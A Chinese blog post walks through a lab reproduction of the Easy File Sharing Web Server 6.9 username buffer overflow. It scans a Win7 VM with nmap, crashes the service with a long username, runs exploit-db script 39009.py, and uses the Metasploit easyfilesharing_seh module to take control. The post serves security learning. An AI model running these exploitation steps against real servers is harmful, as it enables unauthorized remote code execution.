Easy File Sharing Web Server 缓冲区溢出漏洞

最新推荐文章于 2023-12-26 17:47:17 发布
最新推荐文章于 2023-12-26 17:47:17 发布
阅读量1.9k 收藏 6
点赞数
文章标签: 前端 服务器 安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_55857040/article/details/121903996
版权

目录

漏洞介绍

环境准备

复现过程

一、环境搭建

二、漏洞利用

利用漏洞

利用metasploit进行漏洞利用

 在kali打开msf控制台

​  输入命令,寻找找到EasyFileSharing漏洞的利用模块

小结

漏洞介绍

 由于Easy File Sharing Web Server 6.9这个程序对输入的用户名长度不进行校验,存在缓冲区溢出漏洞,导致当用户输入太长的用户名导致缓冲区溢出,覆盖程序原本的返回地址,导致程序因跳转到非法地址奔溃或跳转到黑客控制的恶意代码地址进而导致服务器被黑客控制。

环境准备

攻击机:Kali-Linux-2021.2-vmware-amd64 192.168.xxx.xxx

靶机:Win7 旗舰版 192.168.xxx.xxx

服务程序:Easy File Sharing Web Server 2018

服务端口: 80

复现过程

一、环境搭建

①在win7旗舰虚拟机上安装Easy File Sharing Web Server 2018,照安装向导一路默认就行了

 安装好后对跳出来这个,我们点击try it(试用)就行了

打开我我们看到http协议开在80端口(这个很很关键,因为我们要用到的就是目标靶机80端口的http服务版本是 Easy File Sharing Web Server httpd 6.9 ,这个版本存在缓冲区溢出漏洞)

②先打开kali窗口我们对靶机用nmap命令扫描一下80端口情况

 nmap -p 80 192.168.40.130 -sV

80端口是打开的,发现目标靶机80端口的http服务版本是 Easy File Sharing Web Server httpd 6.9 ,这个版本存在缓冲区溢出漏洞

二、漏洞利用

①kali虚拟机打开浏览器,输入

192.168.40.130:80   (注意英文符号以及无空格)

 进入到Easy File Sharing Web Server的登入页

当我们在Username中输入过长的用户名时,该服务程序会发生缓冲区溢出

所以我先用python生成5000个a字符,然后复制粘贴填入,发现网页许久无反应

 查看靶机,发现Easy File Sharing Web Server已被漏洞瘫痪

利用漏洞

在kali自带的漏洞利用脚本库中寻找easy file sharing的漏洞利用脚本

searchsploit easy file sharing

选择利用39009.py文件脚本,使用

python /usr/share/exploitdb/exploits/windows/remote/39009.py 192.168.40.130(靶机ip) 80

查看靶机,查看目标靶机,发现目标靶机已经弹计算器并且程序崩溃了

利用metasploit进行漏洞利用

 在kali打开msf控制台

  输入命令,寻找找到EasyFileSharing漏洞的利用模块

search EasyFileSharing

使用红圈这个

输入命令

use exploit/windows/http/easyfilesharing_seh

进行ip配置,先打开配置查看配置选项,然后再配置靶机ip,命令如下

show options

set RHOSTS 192.168.40.130

配置成功,然后我们进行下一步,输入命令执行攻击模块

exploit

 

攻击执行成功就可以对靶机执行控制了

小结

电脑一定要安装安全软件和杀毒软件,保障我们电脑的安全

 

 

 

 

 

 

 

qq_55857040
关注
  • 0
    点赞
  • 6
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
Easy File Sharing Web Server 7.2
01-15
Easy File Sharing Web Server 是一种允许访客容易地经由浏览器上传/下载文件的文件分享系统.
Easy File Sharing Web Server(缓冲区溢出漏洞)
Coffilater的博客
12-13 3423
缓冲区溢出简介 缓冲区溢出是指计算机向缓冲区内填充数据位数时超过了缓冲区本身的容量,溢出的数据覆盖在合法数据上。理想的情况是:程序会检查数据长度,而且并不允许输入超过缓冲区长度的字符。但是绝大多数程序都会假设数据长度总是与所分配的储存空间相匹配,这就为缓冲区溢出埋下隐患。操作系统所使用的缓冲区,又被称为“堆栈”,在各个操作进程之间,指令会被临时储存在“堆栈”当中,“堆栈”也会出现缓冲区溢出Easy File Sharing Web Server 漏洞复现 实验环境: 攻击机:kali L
Easy File Sharing Web Server 缓冲区溢出漏洞利用
qq_42877870的博客
04-05 2214
Easy File Sharing Web Server 缓冲区溢出漏洞利用 1.首先我们先打开一台windows7系统的虚拟机,运行efssetup_2018并安装easy file sharing server 接着我们将easy file sharing web server的端口改为8000,并按下Restart键 从easy file sharing web s...
什么是文件共享软件?文件传输软件如何共享?
镭速的博客
04-12 661
它是一个文件共享软件应用程序,可让强大的数据保护层下将任何大小的文件发送到世界上的任何地方。以光速发送和共享无限数量的文件。可以提交门户并使用语言,品牌,存储等自定义门户。可以选择一个存储点,例如文件传输软件,硬盘或云存储。
实验--easyfilesharing
wow_iamfree的博客
10-17 1578
1.启easyfilesharing 2.查看本机ip(这里为我手机热点连接,看WLAN下的ip) 3.修改好easyfilesharing的访问地址和开发端口,并访问一下 主机上可访问,已经正常启动 4.用虚拟机扫描查看开放的的端口和对应服务 nmap -T4 -V -sV 192.168.43.246 可以看出我的主机开放了一些端口并提供了一些对应的服务,其中8000端口开放了http服务,并显示了其端口上运行软件的版本(稍后会自行百度查找其他的端口开放服务) 既然开放了http服务,就从kal
最好的web文件分享工具Easy File Sharing Web Server
05-26
Easy File Sharing Web Server允许用户不需要任何附加的软件或服务就可以架设一个安全的、基于网页的P2P文件分享、传输系统。 除了HTML网页界面设计,Easy File Sharing Web Server还可以让你直接在自己的PC上快速...
Easy File Sharing Web Server 7.2.zip.7z
12-15
Easy File Sharing Web Server 7.2:文件分享与安全风险》 Easy File Sharing Web Server(简称EFSWS)是一款广泛使用的文件分享软件,它使用户能够通过网页浏览器轻松实现文件的上传和下载。该软件设计简洁,...
easy.file.sharing.web.server.v6.9.rar.7z
12-14
Easy File Sharing Web Server允许用户不需要任何附加的软件或服务就可以架设一个安全的、基于网页的P2P文件分享、传输系统。 除了HTML网页界面设计,Easy File Sharing Web Server还可以让你直接在自己的PC上快速架...
Easy File Sharing Web Server v5.5
11-06
Easy File Sharing Web Server v5.5:便捷的文件共享解决方案》 Easy File Sharing Web Server v5.5 是一款专为个人和小型企业设计的网络软件,它提供了一个直观且高效的平台,使得用户可以通过Web浏览器轻松地...
web-攻击本地编译性应用程序】(11.1)缓冲区溢出漏洞
09-01 712
缓冲区溢出漏洞
帆软 FineReport/FineBI channel反序列化漏洞分析
热门推荐
errorr0
07-18 1万+
漏洞分析
漏洞复现】Easy File Sharing Web Server 漏洞的简单利用
qq_44655084的博客
12-20 1078
EFS Web Server 7.2版本中存在基于栈的缓冲区溢出漏洞。远程攻击者可通过向forum.ghp文件发送恶意的登录请求利用该漏洞执行任意代码。
Easy File Sharing Web Server 漏洞的简单利用
qq_51302564的博客
12-15 1077
Easy File Sharing Web Server 漏洞的简单利用 个人博客:https://fly-pluche.github.io/posts/Easy%20File%20Sharing%20Web%20Server/ 背景 EFS Easy File Sharing (EFS) Web Server是荷兰EFS Software公司的一套集论坛网站,文件上传、下载、共享和图片共享等功能的文件共享软件。 EFS EFS Web Server 7.2版本中存在基于栈的缓冲区溢出漏洞。远程攻击者
缓冲区溢出
weixin_46631320的博客
12-15 514
缓冲区溢出
Easy File Sharing Web Server漏洞渗透测试
qq_51634663的博客
12-15 474
复现环境 1、ExpNIS.Windos(靶机) 2、Easy File Sharing Web Server 6.9(软件) 3、Kali-Linux(攻击机) 漏洞复现 1、首先在靶机上安装软件Easy File Sharing Web Server 2018并打开(安装过程较为简单此处不详细说明) 2、在靶机上安装完成后我们还需要找到该靶机,在kali上使用nmap扫描该网段 3、发现靶机IP后,我们使用命令nmap -sV 【目标IP】查看该目标主机上运行的服务,例如在此处我.
Easy File Sharing Web Server漏洞复现任务和Metasploit应用
最新发布
hjhwdwdw的博客
12-26 564
实验环境:win7靶机,kali。
缓冲区溢出漏洞_缓冲区溢出漏洞简介
weixin_26747751的博客
09-14 2047
缓冲区溢出漏洞 重点 (Top highlight) 缓冲 (Buffer) A buffer is a temporary storage, usually present in the physical memory used to hold data. 缓冲区是一种临时存储,通常存在于用于保存数据的物理内存中。 Consider the program shown in the left ...
easy file sharing漏洞复现任务
m0_60466340的博客
11-16 3330
在开始利用漏洞之前需要将靶机与进行攻击的主机连接在同一子网下。 网络连接好之后,查找kali的IP地址 之后就可以用nmap扫描同一子网下的所有主机的IP地址了 可以找出靶机的IP地址,再用nmap -sV命令对靶机上运行的服务和软件进行测试 可以看到目标主机的80端口上运行有easy file sharing 这个软件, 然后我们就可以利用这个软件的漏洞了。 再kali的终端查找和easy file sharing相关的漏洞模块 ~# searchsploit easy file s
easy file sharing server漏洞利用
m0_56368726的博客
11-07 399
1、首先在winxp靶机上安装efssetup_2018.zip,并运行 2、扫描靶机进行的服务 使用nmap进行主动扫描,命令为nmap -sV 192.168.56.131。 可以看到靶机的80端口提供的服务为easy file sharing server。 3、查找漏洞渗透模块 我们可以用“searchsploit"命令在kali中查找所需要的渗透模块。 我们这里以这个漏洞渗透模块为例,这个脚本使用python写的,利用溢出漏洞实现了在靶机执行计算器程序。 ...
wind web server
04-05
Wind is a lightweight and fast web server designed for Windows ...Overall, Wind is an excellent choice for those looking for a lightweight and fast web server that is easy to use and highly customizable.

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值